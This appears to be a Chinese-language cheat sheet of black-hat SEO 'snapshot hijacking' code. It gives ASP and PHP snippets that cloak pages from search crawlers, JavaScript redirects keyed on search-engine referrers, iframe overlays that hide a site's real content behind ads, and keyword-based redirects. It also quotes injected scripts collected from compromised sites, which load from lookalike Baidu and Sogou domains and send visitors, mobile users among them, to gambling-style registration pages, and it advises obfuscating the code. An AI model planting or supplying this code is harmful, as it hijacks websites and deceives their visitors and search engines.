1:網站快照劫持代碼
<%@ LANGUAGE = VBScript.Encode %><% Dim agent agent=Request.ServerVariables("http_user_agent") If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then linkurl="http://這里填網址" *快照網址 Function GetBody(Url) Dim objXML On Error Resume Next Set objXML = CreateObject("Microsoft.XMLHTTP") With objXML .Open "Get", Url, False, "", "" .Send GetBody = .ResponseBody End With GetBody=BytesToBstr(GetBody,"GB2312") Set objXML = Nothing End Function Function BytesToBstr(strBody,CodeBase) dim objStream set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write strBody objStream.Position = 0 objStream.Type = 2 objStream.Charset = CodeBase BytesToBstr = objStream.ReadText objStream.Close set objStream = nothing End Function response.write GetBody(linkurl) End if%> <script LANGUAGE="Javascript"> var s=document.referrer if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) location.href="這里填跳轉地址"; </script>
2:上方顯示廣告,下方顯示原站內容
document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='7350' allowTransparency src=http://這里填網址></iframe>");
3:全屏覆蓋只能看到廣告
var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="50'+'50" src="http://這里填網址"></iframe></center>'; eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ // if(tagname!="center"){ document.body.children[i].style.display="non"+"e"; //} } }catch(e){} } },100); }catch(e){}
4:搜索引擎來路直接跳JS代碼
document.writeln("<script LANGUAGE="Javascript">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");
document.writeln("location.href="這里填網址";");
document.writeln("</script>");
5:根據不同關鍵詞跳轉不同的網址代碼
var title = window["document"]["title"]; title = decodeURI(title); if(title.indexOf("u9ed1u5e3d") > -1){ jumpto("https://www.0116.net/"); //根據上方的Unicode轉碼關鍵詞黑帽跳轉到這個網址 } else if(title.indexOf("轉碼關鍵詞") > -1){ jumpto("http://這里填網址"); } else if(title.indexOf("轉碼關鍵詞") > -1){ jumpto("http://這里填網址"); } else if(title.indexOf("轉碼關鍵詞") > -1){ jumpto("http://這里填網址"); } else { jumpto("http://這里填無關鍵詞跳轉網址"); }
6:打開網站標題正常,快照標題異常
<title>轉碼后的標題,用於劫持快照</title> <script>document.title='網站打開后瀏覽器顯示的標題';</script>
function jumurl(){ window.location.href = 'http://這里填網址' } setTimeout(jumurl,2000); jumurl();
ar d=document.referrer; if (d.indexOf("link?url")>0 || d.indexOf("%A8%B1")>0 || d.indexOf("%9F%8E")>0){ self.location="http://這里填網址"; opener.location.href='http://這里是雙跳網址'; }
識別蜘蛛,蜘蛛劫持,訪客區分展示代碼
<?php $agent = strtolower($_SERVER['HTTP_USER_AGENT']); $baiduspider = stripos($agent,'Baiduspider'); if(stripos($agent,'baiduspider') >-1 || stripos($agent,'360Spider') >-1 || stripos($agent,'sogou')>-1 || stripos($agent,'yisouspider') >-1) else{ header('Content-Type:text/html;charset=gbk'); $url="廣告頁面示范https://www.186seo.com"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //將curl_exec()獲取的信息以文件流的形式返回,而不是直接輸出。 curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // 信任任何證書 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); // 檢查證書中是否設置域名 $r=curl_exec($ch); curl_close($ch); echo $r; exit; } ?>
收集的refer搜狗來路跳轉代碼:
下面這行加在html里
<script type="text/javascript" src="http://m.sogou.com.777sp.xyz/static/v2/mip.js"></script>
http://m.sogou.com.777sp.xyz/static/v2/mip.js JS里面的代碼如下:
var refurl=document.referrer
if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 ||refurl.indexOf("sm")>0 || refurl.indexOf("so")>0 )
window.location.href="http://5588054.com/register?id=10864409";
收集來的refer百度來路跳轉代碼:
<script type="text/javascript" src="http://www.baidu.com.hhxlt.com/static/v2/mip.js"></script>
http://www.baidu.com.hhxlt.com/static/v2/mip.js JS里面的代碼如下:
var refurl=document.referrer
if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 ||refurl.indexOf("sm")>0 || refurl.indexOf("so")>0 )
window.location.href="http://5588054.com/register?id=10864409";
收集的來自神馬的另外一段JS跳轉:
在html頭文件里加上這個 <script type="text/javascript" src="/js/common.js"></script>
document.write ('<script type="text/javascript" src="https://js.users.51.la/20614279.js"></script>');
document.writeln("<script language=\'JavaScript\' src=\'https://www.j666666s.com/3.js\'></script>");
猜測第一段51.la的是51la紅包廣告或流量統計,看了代碼亂七八糟的沒有參考價值。
第二段為識別移動設備跳轉:
https://www.j666666s.com/3.js 的JS內容為:
var url = "http://kiss.zjh19.com:165/az.asp";
try {
var urlhash = window.location.hash;
if (!urlhash.match("fromapp")) {
if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Fennec|BlackBerry|Mobile|IEMobile|MQQBrowser|JUC|Fennec|WosBrowser|BrowserNG|WebOS|Symbian)/i))) {
window.location = "http://kiss.zjh19.com:165/az.asp";
}
}
} catch (err) {}
分析代碼:識別移動設備和移動瀏覽器,然后跳轉到http://kiss.zjh19.com:165/az.asp 這個頁面。
打開直接跳,不跳蜘蛛,寫在.js文件里,然后把js到站長工具里加密:http://tool.chinaz.com/js.aspx
function jumurl(){
window.location.href = 'http://這里填網址'
}
setTimeout(jumurl,2000);
jumurl();